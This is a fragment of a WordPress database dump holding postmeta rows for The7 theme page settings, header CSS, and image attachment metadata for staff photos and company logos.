(30899,4024,'_dt_teammate_options_website',''),
(30900,4024,'_dt_teammate_options_mail',''),
(30901,4024,'_dt_teammate_options_facebook',''),
(30902,4024,'_dt_teammate_options_twitter',''),
(30903,4024,'_dt_teammate_options_dribbble',''),
(30904,4024,'_dt_teammate_options_you-tube',''),
(30905,4024,'_dt_teammate_options_rss',''),
(30906,4024,'_dt_teammate_options_delicious',''),
(30907,4024,'_dt_teammate_options_flickr',''),
(30908,4024,'_dt_teammate_options_lastfm',''),
(30909,4024,'_dt_teammate_options_linkedin',''),
(30910,4024,'_dt_teammate_options_vimeo',''),
(30911,4024,'_dt_teammate_options_tumbler',''),
(30912,4024,'_dt_teammate_options_pinterest',''),
(30913,4024,'_dt_teammate_options_devian',''),
(30914,4024,'_dt_teammate_options_skype',''),
(30915,4024,'_dt_teammate_options_github',''),
(30916,4024,'_dt_teammate_options_instagram',''),
(30917,4024,'_dt_teammate_options_stumbleupon',''),
(30918,4024,'_dt_teammate_options_behance',''),
(30919,4024,'_dt_teammate_options_px-500',''),
(30920,4024,'_dt_teammate_options_tripedvisor',''),
(30921,4024,'_dt_teammate_options_vk',''),
(30922,4024,'_dt_teammate_options_foursquare',''),
(30923,4024,'_dt_teammate_options_xing',''),
(30924,4024,'_dt_teammate_options_weibo',''),
(30925,4024,'_dt_teammate_options_odnoklassniki',''),
(30926,4024,'_dt_teammate_options_research-gate',''),
(30927,4024,'_dt_teammate_options_yelp',''),
(30928,4024,'_dt_teammate_options_blogger',''),
(30929,4024,'_dt_teammate_options_soundcloud',''),
(30930,4024,'_dt_teammate_options_viber',''),
(30931,4024,'_dt_teammate_options_whatsapp',''),
(30932,4024,'_dt_teammate_options_reddit',''),
(30933,4024,'_dt_teammate_options_snapchat',''),
(30934,4024,'_dt_teammate_options_telegram',''),
(30935,4024,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(30936,4027,'_edit_lock','1680419405:1'),
(30937,4028,'_wp_attached_file','2023/04/dr-ossama.jpg'),
(30938,4028,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:191;s:6:\"height\";i:224;s:4:\"file\";s:21:\"2023/04/dr-ossama.jpg\";s:8:\"filesize\";i:6261;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"dr-ossama-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4391;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(30939,4027,'_thumbnail_id','4028'),
(30940,4027,'_edit_last','1'),
(30941,4027,'_dt_sidebar_position','disabled'),
(30942,4027,'_dt_sidebar_widgetarea_id','sidebar_1'),
(30943,4027,'_dt_sidebar_hide_on_mobile','0'),
(30944,4027,'_dt_footer_show','1'),
(30945,4027,'_dt_footer_widgetarea_id','sidebar_2'),
(30946,4027,'_dt_footer_hide_on_mobile','0'),
(30947,4027,'_dt_header_title','fancy'),
(30948,4027,'_dt_header_background','normal'),
(30949,4027,'_dt_header_background_below_slideshow','disabled'),
(30950,4027,'_dt_header_transparent_bg_color_scheme','light'),
(30951,4027,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(30952,4027,'_dt_header_transparent_top_bar_bg_opacity','25'),
(30953,4027,'_dt_header_transparent_bg_color','#000000'),
(30954,4027,'_dt_header_transparent_bg_opacity','50'),
(30955,4027,'_dt_header_disabled_background','normal'),
(30956,4027,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(30957,4027,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(30958,4027,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(30959,4027,'_dt_header_disabled_transparent_bg_color','#000000'),
(30960,4027,'_dt_header_disabled_transparent_bg_opacity','50'),
(30961,4027,'_dt_page_overrides_top_margin',''),
(30962,4027,'_dt_page_overrides_right_margin',''),
(30963,4027,'_dt_page_overrides_bottom_margin',''),
(30964,4027,'_dt_page_overrides_left_margin',''),
(30965,4027,'_dt_mobile_page_padding_top',''),
(30966,4027,'_dt_mobile_page_padding_right',''),
(30967,4027,'_dt_mobile_page_padding_bottom',''),
(30968,4027,'_dt_mobile_page_padding_left',''),
(30969,4027,'_dt_fancy_header_layout_heading',''),
(30970,4027,'_dt_fancy_header_title_aligment','center'),
(30971,4027,'_dt_fancy_header_height','300'),
(30972,4027,'_dt_fancy_header_padding-top','0px'),
(30973,4027,'_dt_fancy_header_padding-bottom','0px'),
(30974,4027,'_dt_fancy_header_breadcrumbs_heading',''),
(30975,4027,'_dt_fancy_header_breadcrumbs','disabled'),
(30976,4027,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(30977,4027,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(30978,4027,'_dt_fancy_header_title_heading',''),
(30979,4027,'_dt_fancy_header_title_mode','generic'),
(30980,4027,'_dt_fancy_header_title',''),
(30981,4027,'_dt_fancy_header_title_font_size','30'),
(30982,4027,'_dt_fancy_header_title_line_height','36'),
(30983,4027,'_dt_fancy_header_text_transform','none'),
(30984,4027,'_dt_fancy_header_title_color_mode','color'),
(30985,4027,'_dt_fancy_header_title_color','#ffffff'),
(30986,4027,'_dt_fancy_header_subtitle_heading',''),
(30987,4027,'_dt_fancy_header_subtitle',''),
(30988,4027,'_dt_fancy_header_subtitle_font_size','18'),
(30989,4027,'_dt_fancy_header_subtitle_line_height','26'),
(30990,4027,'_dt_fancy_header_subtitle_text_transform','none'),
(30991,4027,'_dt_fancy_header_subtitle_color_mode','color'),
(30992,4027,'_dt_fancy_header_subtitle_color','#ffffff'),
(30993,4027,'_dt_fancy_header_bg_heading',''),
(30994,4027,'_dt_fancy_header_bg_color','#222222'),
(30995,4027,'_dt_fancy_header_bg_image_origin','custom'),
(30996,4027,'_dt_fancy_header_bg_image','a:0:{}'),
(30997,4027,'_dt_fancy_header_bg_repeat','no-repeat'),
(30998,4027,'_dt_fancy_header_bg_position_x','center'),
(30999,4027,'_dt_fancy_header_bg_position_y','center'),
(31000,4027,'_dt_fancy_header_bg_fullscreen','1'),
(31001,4027,'_dt_fancy_header_bg_overlay','0'),
(31002,4027,'_dt_fancy_header_overlay_color','#000'),
(31003,4027,'_dt_fancy_header_bg_overlay_opacity','50'),
(31004,4027,'_dt_fancy_header_scroll_effect','default'),
(31005,4027,'_dt_fancy_header_bg_parallax','0.5'),
(31006,4027,'_dt_fancy_header_responsiveness_heading',''),
(31007,4027,'_dt_fancy_header_responsiveness','enabled'),
(31008,4027,'_dt_fancy_header_responsiveness_switch','778px'),
(31009,4027,'_dt_fancy_header_responsive_height','70'),
(31010,4027,'_dt_fancy_header_responsive_font_size','30'),
(31011,4027,'_dt_fancy_header_responsive_title_line_height','38'),
(31012,4027,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(31013,4027,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(31014,4027,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(31015,4027,'_dt_teammate_options_go_to_single','1'),
(31016,4027,'_dt_teammate_options_position',''),
(31017,4027,'_dt_teammate_options_website',''),
(31018,4027,'_dt_teammate_options_mail',''),
(31019,4027,'_dt_teammate_options_facebook',''),
(31020,4027,'_dt_teammate_options_twitter',''),
(31021,4027,'_dt_teammate_options_dribbble',''),
(31022,4027,'_dt_teammate_options_you-tube',''),
(31023,4027,'_dt_teammate_options_rss',''),
(31024,4027,'_dt_teammate_options_delicious',''),
(31025,4027,'_dt_teammate_options_flickr',''),
(31026,4027,'_dt_teammate_options_lastfm',''),
(31027,4027,'_dt_teammate_options_linkedin',''),
(31028,4027,'_dt_teammate_options_vimeo',''),
(31029,4027,'_dt_teammate_options_tumbler',''),
(31030,4027,'_dt_teammate_options_pinterest',''),
(31031,4027,'_dt_teammate_options_devian',''),
(31032,4027,'_dt_teammate_options_skype',''),
(31033,4027,'_dt_teammate_options_github',''),
(31034,4027,'_dt_teammate_options_instagram',''),
(31035,4027,'_dt_teammate_options_stumbleupon',''),
(31036,4027,'_dt_teammate_options_behance',''),
(31037,4027,'_dt_teammate_options_px-500',''),
(31038,4027,'_dt_teammate_options_tripedvisor',''),
(31039,4027,'_dt_teammate_options_vk',''),
(31040,4027,'_dt_teammate_options_foursquare',''),
(31041,4027,'_dt_teammate_options_xing',''),
(31042,4027,'_dt_teammate_options_weibo',''),
(31043,4027,'_dt_teammate_options_odnoklassniki',''),
(31044,4027,'_dt_teammate_options_research-gate',''),
(31045,4027,'_dt_teammate_options_yelp',''),
(31046,4027,'_dt_teammate_options_blogger',''),
(31047,4027,'_dt_teammate_options_soundcloud',''),
(31048,4027,'_dt_teammate_options_viber',''),
(31049,4027,'_dt_teammate_options_whatsapp',''),
(31050,4027,'_dt_teammate_options_reddit',''),
(31051,4027,'_dt_teammate_options_snapchat',''),
(31052,4027,'_dt_teammate_options_telegram',''),
(31053,4027,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(31054,4029,'_edit_lock','1680419524:1'),
(31055,4030,'_wp_attached_file','2023/04/dr-sherif.jpg'),
(31056,4030,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:803;s:6:\"height\";i:979;s:4:\"file\";s:21:\"2023/04/dr-sherif.jpg\";s:8:\"filesize\";i:97374;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:21:\"dr-sherif-246x300.jpg\";s:5:\"width\";i:246;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16911;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:21:\"dr-sherif-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6772;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:21:\"dr-sherif-768x936.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:936;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103819;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:21:\"dr-sherif-500x610.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:610;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52039;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:21:\"dr-sherif-800x975.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:975;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:109746;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(31057,4029,'_thumbnail_id','4030'),
(31058,4029,'_edit_last','1'),
(31059,4029,'_dt_sidebar_position','disabled'),
(31060,4029,'_dt_sidebar_widgetarea_id','sidebar_1'),
(31061,4029,'_dt_sidebar_hide_on_mobile','0'),
(31062,4029,'_dt_footer_show','1'),
(31063,4029,'_dt_footer_widgetarea_id','sidebar_2'),
(31064,4029,'_dt_footer_hide_on_mobile','0'),
(31065,4029,'_dt_header_title','fancy'),
(31066,4029,'_dt_header_background','normal'),
(31067,4029,'_dt_header_background_below_slideshow','disabled'),
(31068,4029,'_dt_header_transparent_bg_color_scheme','light'),
(31069,4029,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(31070,4029,'_dt_header_transparent_top_bar_bg_opacity','25'),
(31071,4029,'_dt_header_transparent_bg_color','#000000'),
(31072,4029,'_dt_header_transparent_bg_opacity','50'),
(31073,4029,'_dt_header_disabled_background','normal'),
(31074,4029,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(31075,4029,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(31076,4029,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(31077,4029,'_dt_header_disabled_transparent_bg_color','#000000'),
(31078,4029,'_dt_header_disabled_transparent_bg_opacity','50'),
(31079,4029,'_dt_page_overrides_top_margin',''),
(31080,4029,'_dt_page_overrides_right_margin',''),
(31081,4029,'_dt_page_overrides_bottom_margin',''),
(31082,4029,'_dt_page_overrides_left_margin',''),
(31083,4029,'_dt_mobile_page_padding_top',''),
(31084,4029,'_dt_mobile_page_padding_right',''),
(31085,4029,'_dt_mobile_page_padding_bottom',''),
(31086,4029,'_dt_mobile_page_padding_left',''),
(31087,4029,'_dt_fancy_header_layout_heading',''),
(31088,4029,'_dt_fancy_header_title_aligment','center'),
(31089,4029,'_dt_fancy_header_height','300'),
(31090,4029,'_dt_fancy_header_padding-top','0px'),
(31091,4029,'_dt_fancy_header_padding-bottom','0px'),
(31092,4029,'_dt_fancy_header_breadcrumbs_heading',''),
(31093,4029,'_dt_fancy_header_breadcrumbs','disabled'),
(31094,4029,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(31095,4029,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(31096,4029,'_dt_fancy_header_title_heading',''),
(31097,4029,'_dt_fancy_header_title_mode','generic'),
(31098,4029,'_dt_fancy_header_title',''),
(31099,4029,'_dt_fancy_header_title_font_size','30'),
(31100,4029,'_dt_fancy_header_title_line_height','36'),
(31101,4029,'_dt_fancy_header_text_transform','none'),
(31102,4029,'_dt_fancy_header_title_color_mode','color'),
(31103,4029,'_dt_fancy_header_title_color','#ffffff'),
(31104,4029,'_dt_fancy_header_subtitle_heading',''),
(31105,4029,'_dt_fancy_header_subtitle',''),
(31106,4029,'_dt_fancy_header_subtitle_font_size','18'),
(31107,4029,'_dt_fancy_header_subtitle_line_height','26'),
(31108,4029,'_dt_fancy_header_subtitle_text_transform','none'),
(31109,4029,'_dt_fancy_header_subtitle_color_mode','color'),
(31110,4029,'_dt_fancy_header_subtitle_color','#ffffff'),
(31111,4029,'_dt_fancy_header_bg_heading',''),
(31112,4029,'_dt_fancy_header_bg_color','#222222'),
(31113,4029,'_dt_fancy_header_bg_image_origin','custom'),
(31114,4029,'_dt_fancy_header_bg_image','a:0:{}'),
(31115,4029,'_dt_fancy_header_bg_repeat','no-repeat'),
(31116,4029,'_dt_fancy_header_bg_position_x','center'),
(31117,4029,'_dt_fancy_header_bg_position_y','center'),
(31118,4029,'_dt_fancy_header_bg_fullscreen','1'),
(31119,4029,'_dt_fancy_header_bg_overlay','0'),
(31120,4029,'_dt_fancy_header_overlay_color','#000'),
(31121,4029,'_dt_fancy_header_bg_overlay_opacity','50'),
(31122,4029,'_dt_fancy_header_scroll_effect','default'),
(31123,4029,'_dt_fancy_header_bg_parallax','0.5'),
(31124,4029,'_dt_fancy_header_responsiveness_heading',''),
(31125,4029,'_dt_fancy_header_responsiveness','enabled'),
(31126,4029,'_dt_fancy_header_responsiveness_switch','778px'),
(31127,4029,'_dt_fancy_header_responsive_height','70'),
(31128,4029,'_dt_fancy_header_responsive_font_size','30'),
(31129,4029,'_dt_fancy_header_responsive_title_line_height','38'),
(31130,4029,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(31131,4029,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(31132,4029,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(31133,4029,'_dt_teammate_options_go_to_single','1'),
(31134,4029,'_dt_teammate_options_position',''),
(31135,4029,'_dt_teammate_options_website',''),
(31136,4029,'_dt_teammate_options_mail',''),
(31137,4029,'_dt_teammate_options_facebook',''),
(31138,4029,'_dt_teammate_options_twitter',''),
(31139,4029,'_dt_teammate_options_dribbble',''),
(31140,4029,'_dt_teammate_options_you-tube',''),
(31141,4029,'_dt_teammate_options_rss',''),
(31142,4029,'_dt_teammate_options_delicious',''),
(31143,4029,'_dt_teammate_options_flickr',''),
(31144,4029,'_dt_teammate_options_lastfm',''),
(31145,4029,'_dt_teammate_options_linkedin',''),
(31146,4029,'_dt_teammate_options_vimeo',''),
(31147,4029,'_dt_teammate_options_tumbler',''),
(31148,4029,'_dt_teammate_options_pinterest',''),
(31149,4029,'_dt_teammate_options_devian',''),
(31150,4029,'_dt_teammate_options_skype',''),
(31151,4029,'_dt_teammate_options_github',''),
(31152,4029,'_dt_teammate_options_instagram',''),
(31153,4029,'_dt_teammate_options_stumbleupon',''),
(31154,4029,'_dt_teammate_options_behance',''),
(31155,4029,'_dt_teammate_options_px-500',''),
(31156,4029,'_dt_teammate_options_tripedvisor',''),
(31157,4029,'_dt_teammate_options_vk',''),
(31158,4029,'_dt_teammate_options_foursquare',''),
(31159,4029,'_dt_teammate_options_xing',''),
(31160,4029,'_dt_teammate_options_weibo',''),
(31161,4029,'_dt_teammate_options_odnoklassniki',''),
(31162,4029,'_dt_teammate_options_research-gate',''),
(31163,4029,'_dt_teammate_options_yelp',''),
(31164,4029,'_dt_teammate_options_blogger',''),
(31165,4029,'_dt_teammate_options_soundcloud',''),
(31166,4029,'_dt_teammate_options_viber',''),
(31167,4029,'_dt_teammate_options_whatsapp',''),
(31168,4029,'_dt_teammate_options_reddit',''),
(31169,4029,'_dt_teammate_options_snapchat',''),
(31170,4029,'_dt_teammate_options_telegram',''),
(31171,4029,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(31172,4031,'_wp_attached_file','2023/03/dr-ayman.jpg'),
(31173,4031,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:147;s:6:\"height\";i:166;s:4:\"file\";s:20:\"2023/03/dr-ayman.jpg\";s:8:\"filesize\";i:8045;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"dr-ayman-147x150.jpg\";s:5:\"width\";i:147;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4374;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(31174,3943,'rs_page_bg_color',''),
(31175,3943,'_wp_old_date','2023-03-28'),
(31176,3943,'_wp_old_date','2023-01-28'),
(31177,3952,'_wp_old_date','2023-03-28'),
(31178,3952,'rs_page_bg_color',''),
(31179,3957,'_wp_old_date','2023-03-28'),
(31180,3957,'rs_page_bg_color',''),
(31181,3589,'_wp_old_date','2023-01-14'),
(31182,3589,'rs_page_bg_color',''),
(31183,3559,'_wp_old_date','2023-01-14'),
(31184,3559,'rs_page_bg_color',''),
(31185,3952,'_wp_old_date','2022-03-28'),
(31186,3948,'rs_page_bg_color',''),
(31188,4033,'_wp_attached_file','2023/04/Xiang-Cheng-electronic-Logo.png'),
(31189,4033,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2363;s:6:\"height\";i:844;s:4:\"file\";s:39:\"2023/04/Xiang-Cheng-electronic-Logo.png\";s:8:\"filesize\";i:86685;s:5:\"sizes\";a:10:{s:6:\"medium\";a:5:{s:4:\"file\";s:39:\"Xiang-Cheng-electronic-Logo-300x107.png\";s:5:\"width\";i:300;s:6:\"height\";i:107;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10019;}s:5:\"large\";a:5:{s:4:\"file\";s:40:\"Xiang-Cheng-electronic-Logo-1024x366.png\";s:5:\"width\";i:1024;s:6:\"height\";i:366;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:52962;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:39:\"Xiang-Cheng-electronic-Logo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6827;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:39:\"Xiang-Cheng-electronic-Logo-768x274.png\";s:5:\"width\";i:768;s:6:\"height\";i:274;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:35651;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:40:\"Xiang-Cheng-electronic-Logo-1536x549.png\";s:5:\"width\";i:1536;s:6:\"height\";i:549;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:100575;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:40:\"Xiang-Cheng-electronic-Logo-2048x731.png\";s:5:\"width\";i:2048;s:6:\"height\";i:731;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:160068;}s:6:\"awb_sm\";a:5:{s:4:\"file\";s:39:\"Xiang-Cheng-electronic-Logo-500x179.png\";s:5:\"width\";i:500;s:6:\"height\";i:179;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19907;}s:6:\"awb_md\";a:5:{s:4:\"file\";s:39:\"Xiang-Cheng-electronic-Logo-800x286.png\";s:5:\"width\";i:800;s:6:\"height\";i:286;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:38341;}s:6:\"awb_lg\";a:5:{s:4:\"file\";s:40:\"Xiang-Cheng-electronic-Logo-1280x457.png\";s:5:\"width\";i:1280;s:6:\"height\";i:457;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:76784;}s:6:\"awb_xl\";a:5:{s:4:\"file\";s:40:\"Xiang-Cheng-electronic-Logo-1920x686.png\";s:5:\"width\";i:1920;s:6:\"height\";i:686;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:143456;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(31190,2679,'_oembed_bc348aea5e9594510a6ea4c03b77c82a','{{unknown}}'),
(31191,2679,'_oembed_461cfe08512c0e16b22220644f03cb0b','{{unknown}}'),
(31192,4041,'_wp_attached_file','2023/04/Geosat-logo.jpg'),
